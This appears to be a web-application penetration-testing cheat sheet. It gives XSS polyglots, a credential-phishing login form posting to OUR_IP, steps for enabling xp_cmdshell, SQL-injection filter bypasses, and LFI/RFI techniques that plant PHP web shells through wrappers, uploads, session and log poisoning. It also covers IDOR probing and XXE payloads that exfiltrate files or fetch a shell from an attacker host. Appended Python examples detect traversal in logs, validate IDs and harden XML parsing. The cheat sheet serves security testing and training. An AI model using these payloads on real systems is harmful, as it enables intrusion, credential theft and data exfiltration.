Part 1
Tools like smuggler.py (Python) can be used to identify potential HTTP request smuggling vulnerabilities.
Serve XSS payload from an XML file
<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://www.w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>
Sample XSS Polyglot
'"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT>
How to perform basic Login Form Injection via Reflected XSS
Step 1: Check that the vulnerable form can be removed by running this script in the browser console (DevTools):
document.getElementById('urlform').remove();
Step 2: Inject the replacement form into the page with the XSS payload by executing the script below in the console (DevTools):
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="text" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
After successfully authenticating to a SQL Server, it is worth checking whether xp_cmdshell has already been enabled:
EXEC xp_cmdshell 'net user';
If xp_cmdshell has not been enabled, run the commands below to enable it and run Windows shell commands from within SQL:
# The commands below turn on advanced options so that xp_cmdshell can be configured
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE; sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Basic SQL Testing
WAF BYPASSES
SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`
Passwords
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users
LFI via this path does not work at first:
/fileRead.jsp?fileName=/etc/passwd (406)
But after replacing characters with the ? wildcard you may receive a successful response (200):
/fileRead.jsp?fileName=/?tc/?asswd (200)
fileRead.jsp?fileName=/??c/??sswd (200)
# ffuf (parameter fuzzing)
ffuf -w $SECLISTS/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI
https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-Jhaddix.txt
https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt
https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/File%20Inclusion/#basic-lfi
# Basic LFI
/etc/passwd
# Path Traversal
../../../../../../etc/passwd
# When / is filtered
....//....//....//....//etc/passwd
# Other Techniques
....////
# Path Truncation
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done
# Null Bytes
../../../../../../etc/passwd%00
# Filter Wrapper
php://filter/read=convert.base64-encode/resource=config
Data Wrapper
The data wrapper is only available to use if the (allow_url_include) setting is enabled in the PHP configurations.
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check allow_url_include Enabled
grep allow_url_include /etc/php/X.Y/apache2/php.ini
# Remote Code Execution
echo '<?php system($_GET["cmd"]); ?>' | base64
data://text/plain;base64,<base64>&cmd=id
Input Wrapper
The target must accept POST requests for this attack to work. The input wrapper also depends on the allow_url_include setting.
# Gaining Remote Code Execution
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
Expect Wrapper
# Check PHP Config
/etc/php/X.Y/apache2/php.ini
# Check expect Extension Enabled
grep expect /etc/php/X.Y/apache2/php.ini
# Gaining Remote Code Execution
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
# Verify RFI
grep allow_url_include php.ini
# RFI File
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# Host File
sudo python3 -m http.server 8000
# Execute Command
/shell.php&cmd=id
# Create RCE File
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
# Execute Command
./profile_images/shell.gif&cmd=id
# Create Malicious ZIP File
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
# Execute Command
zip://./profile_images/shell.jpg%23shell.php&cmd=id
# Create Malicious PHP File
## Shell.php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
# Compile PHP -> Phar
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
# Execute Command
phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
# PHP Session File (name derived from the session cookie)
/var/lib/php/sessions/sess_<your_session_id>
# Poison Session
/var/lib/php/sessions/%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
# RCE
/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
# Default Location Apache
/var/log/apache2/access.log
/var/log/apache2/error.log
C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log
# Default Location Nginx
/var/log/nginx/access.log
/var/log/nginx/error.log
C:\nginx\log\access.log
C:\nginx\log\error.log
# Inject Into User-Agent Header
User-Agent: <?php system($_GET["cmd"]); ?>
# Code Execution
/var/log/apache2/access.log&cmd=id
?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}
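Added example (not from the original page or any tool it cites): a small Python detector that scans Apache/Nginx combined-format access-log lines for the traversal sequences, stream wrappers, sensitive paths and log-poisoning User-Agents covered above, decoding double-encoded values first. The log lines are constructed and the signature labels are this example's own.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache/Nginx "combined" log format; the User-Agent field may contain escaped quotes.
LOG_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>(?:[^"\\]|\\.)*)"'
)

# Each signature is tested against a fully URL-decoded parameter value.
SIGNATURES = {
    "traversal": re.compile(r"\.\./|\.\.\\|\.{4}//"),                 # ../  ..\  ....//
    "null_byte": re.compile(r"\x00"),                                   # %00 truncation
    "sensitive_path": re.compile(r"/etc/passwd|/var/log/|/var/lib/php/sessions|php\.ini", re.I),
    "stream_wrapper": re.compile(r"^(php|data|expect|zip|phar)://", re.I),
    "remote_include": re.compile(r"^(https?|ftp)://", re.I),           # RFI
}
PHP_TAG = re.compile(r"<\?(php|=)", re.I)                              # log-poisoning marker


def fully_decode(value):
    """Collapse repeated URL encoding so %252e%252e%252f is seen as ../."""
    for _ in range(3):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return findings such as 'page=traversal' for one access-log line."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for name, raw in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        value = fully_decode(raw)
        findings += [f"{name}={label}" for label, rx in SIGNATURES.items() if rx.search(value)]
    if PHP_TAG.search(m["ua"]):
        findings.append("user_agent=php_tag")
    return findings


# Constructed sample log lines (not real traffic) exercising the techniques above.
SAMPLE_LOG = r'''
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?page=....//....//etc/passwd%00 HTTP/1.1" 200 1980 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?language=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 3102 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?language=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 88 "-" "<?php system($_GET[\"cmd\"]); ?>"
'''.strip().splitlines()
```

Run `inspect_line` over each entry of `SAMPLE_LOG`; only the first line comes back clean.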
Find and replace IDs in URLs, headers and body: /users/01 => /users/02
Try parameter pollution: users=01 => users=01&users=02
Special characters: /users/01* or /users/* => disclosure of every single user
Try older versions of API endpoints: /api/v3/users/01 => /api/v1/users/02
Add an extension: /users/01 => /users/02.json
Change request methods: POST /users/01 => GET, PUT, PATCH, DELETE, OPTIONS, etc.
Check if the Referer or other headers are used to validate IDs.
Encrypted IDs: if the application is using encrypted IDs, try to decrypt them using a hashing/cracking tool
Send a wildcard: {"user_id":"*"}
Send the ID twice: URL?id=&id=
JSON wrap: {"id":111} --> {"id":{"id":111}}
Wrap the ID in an array: {"id":111} --> {"id":[111]}
Swap a GUID with a numeric ID or email: /users/XXXXXXXX-XXXX-XXXX-XXXXXXXXXXXX => /users/02 or /users/a@b.com
Try GUIDs such as 00000000-0000-0000-000000000000 and 11111111-1111-1111-111111111111
GUID enumeration: try to disclose GUIDs using Google dorks, GitHub, Wayback, Burp history
If none of the GUID enumeration methods work, try SignUp, Reset Password and other endpoints and analyze the responses. An endpoint may disclose a user's GUID within the application.
When a server responds with a 401/403, the action may still have been performed. Be sure to verify the function within the application.
Blind IDORs: look for endpoints/features that may disclose information
Chain IDOR with XSS for account takeovers
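Added example (not from the original page): how a server side can close the IDOR probes in this checklist, in Python. It accepts exactly one plain numeric id, rejects the duplicated, wrapped, array and wildcard forms listed above, and checks object ownership before acting; the OWNERS map, user names and function names are constructed for illustration.

```python
from typing import Any, Dict, List, Tuple


class Rejected(ValueError):
    """Request refused before any object is touched."""


def extract_id(query: List[Tuple[str, str]], body: Dict[str, Any]) -> int:
    """Accept exactly one plain integer id from the query string or the JSON body."""
    candidates = [v for k, v in query if k == "id"]
    if "id" in body:
        candidates.append(body["id"])
    if len(candidates) != 1:
        # Blocks URL?id=&id= duplication and query/body parameter pollution.
        raise Rejected("exactly one id expected")
    value = candidates[0]
    if isinstance(value, bool) or not isinstance(value, (int, str)):
        # Blocks {"id":[111]} and {"id":{"id":111}} wrapping.
        raise Rejected("id must be a scalar")
    if isinstance(value, str):
        if not (value.isascii() and value.isdigit()):
            # Blocks "*", "01*", e-mail addresses and GUID swaps.
            raise Rejected("id must be numeric")
        value = int(value)
    return value


# Constructed stand-in for the application's database: object id -> owning user.
OWNERS = {1: "alice", 2: "bob"}


def fetch_user_record(requester: str, query, body) -> Dict[str, Any]:
    """Object-level authorization: the ownership check runs before the action,
    and a foreign id and a missing id get the same response (no enumeration oracle)."""
    oid = extract_id(query, body)
    if OWNERS.get(oid) != requester:
        raise Rejected("not found")
    return {"id": oid, "owner": requester}


def rejects(requester, query, body) -> bool:
    """True if the request is refused (used by the checks below)."""
    try:
        fetch_user_record(requester, query, body)
    except Rejected:
        return True
    return False
```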
Send a POST request with the path to the XML file for exploitation:
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
Or use a script to send the payload: curl.sh
#!/bin/bash
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php
ID.xml
<!--ID command example-->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
Read Robots.txt (Base 64)
<!--Base64 response example-->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=http://vulnerable site/" >]>
<entry>
<subject>&xxe;</subject>
<category>Clothing</category>
<text>New Shoes</text>
</entry>
<!DOCTYPE email [
<!ENTITY read SYSTEM "file:///etc/passwd">
]>
<!DOCTYPE email [
<!ENTITY read SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>
# Create RCE Shell
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php
# XXE Injection
<?xml version="1.0"?>
<!DOCTYPE email [
<!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>
Exfiltration with CDATA
# Create DTD File
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd
# Upload XXE
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA[">
<!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php">
<!ENTITY % end "]]>">
<!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd">
%xxe;
]>
...
<email>&joined;</email>
Error Based XXE
# DTD File
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">
# Upload XXE
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%error;
]>
Out of Band Data Exfiltration
# DTD File
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">
# PHP Server Setup
<?php
if(isset($_GET['content'])){
error_log("\n\n" . base64_decode($_GET['content']));
}
?>
# Run PHP Server
php -S 0.0.0.0:8000
# XXE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
%remote;
%oob;
]>
<root>&content;</root>
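Added example (not from the original page): hardened parsing of untrusted XML with Python's standard-library expat bindings, which refuses the DOCTYPE, entity declaration and external entity constructs used throughout this section before anything is resolved. The sample documents are constructed from the payload shapes above; the function and class names are this example's own.

```python
from xml.parsers import expat


class XXERejected(ValueError):
    """The document tried to use DTD or entity machinery."""


def parse_untrusted_xml(data: bytes) -> dict:
    """Return {child_tag: text} for the root's children; refuse any DOCTYPE,
    entity declaration or external entity reference before it is resolved."""
    parser = expat.ParserCreate()
    # Never fetch or expand parameter entities (the remote xxe.dtd trick above).
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def refuse(first, *rest):
        # An exception raised inside a handler propagates out of Parse().
        raise XXERejected(f"DTD/entity construct refused: {first!r}")

    parser.StartDoctypeDeclHandler = refuse    # <!DOCTYPE ...> and its internal subset
    parser.EntityDeclHandler = refuse          # <!ENTITY ...>, internal or SYSTEM
    parser.ExternalEntityRefHandler = refuse   # &xxe; resolving outside the document
    fields, tags = {}, []

    def start(name, attrs):
        tags.append(name)
        if len(tags) == 2:                     # direct child of the root element
            fields[name] = ""

    def text(chunk):
        if len(tags) == 2:
            fields[tags[-1]] += chunk

    parser.StartElementHandler = start
    parser.CharacterDataHandler = text
    parser.EndElementHandler = lambda name: tags.pop()
    parser.Parse(data, True)
    return fields


def rejected(data: bytes) -> bool:
    """True if the hardened parser refuses the document."""
    try:
        parse_untrusted_xml(data)
    except XXERejected:
        return True
    return False


# Constructed inputs: a benign submission, the expect://id entity payload, and the blind variant loading a remote DTD.
BENIGN = b"<entry><subject>Hello</subject><category>Clothing</category><text>New Shoes</text></entry>"
XXE = b'<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "expect://id">]><entry><subject>&xxe;</subject></entry>'
BLIND = b'<!DOCTYPE email [<!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">%remote;]><root>&content;</root>'
```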